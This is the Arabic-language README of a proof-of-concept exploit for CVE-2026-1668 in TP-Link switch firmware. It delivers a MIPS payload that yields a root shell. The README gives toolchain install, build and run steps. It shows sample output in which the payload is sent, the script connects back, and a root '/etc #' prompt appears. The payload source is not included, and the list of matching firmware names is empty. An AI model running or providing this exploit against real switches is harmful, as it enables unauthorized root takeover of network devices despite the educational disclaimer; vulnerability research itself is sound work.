
إثبات مفهوم للاستغلال لثغرة CVE-2026-1668 في البرنامج الثابت لسويتش TP-Link، حيث يسلّم حمولة MIPS تمنح صدفة بصلاحيات الجذر على الأجهزة المصابة.
هذا استغلال إثبات مفهوم لـ CVE-2026-1668. الغرض منه تعليمي بحت. يُرجى عدم محاولة استغلال أنظمة لا تملكها أو لا تملك إذنًا صريحًا باستغلالها.
تم تطوير إثبات المفهوم هذا مقابل صورة برنامج ثابتة (firmware) تحمل تجزئة SHA256 التالية: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
أسماء البرامج الثابتة المعروفة بمطابقتها لتلك التجزئة (غير حصرية):
من المحتمل أن تكون إصدارات البرامج الثابتة الأقدم عرضة للاستغلال أيضًا، لكنها قد تتطلب تغييرات طفيفة في حمولة الاستغلال.
يمكن العثور على شرح لكيفية عمل الحمولة في منشور المدونة هذا.
مطلوب سلسلة أدوات MIPS Linux GCC لبناء الحمولة. على Ubuntu 24.04، يمكن تثبيتها باستخدام sudo apt install gcc-mips-linux-gnu.
$ make
يجب تشغيل هذا الاستغلال قبل أن يخدم خادم HTTP أول طلب له (أي عند إقلاع جديد).
$ ./run.sh
يُفترض أن يُنزلك السكربت إلى صدفة root. إن لم يحدث ذلك، فقد فشل الاستغلال.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #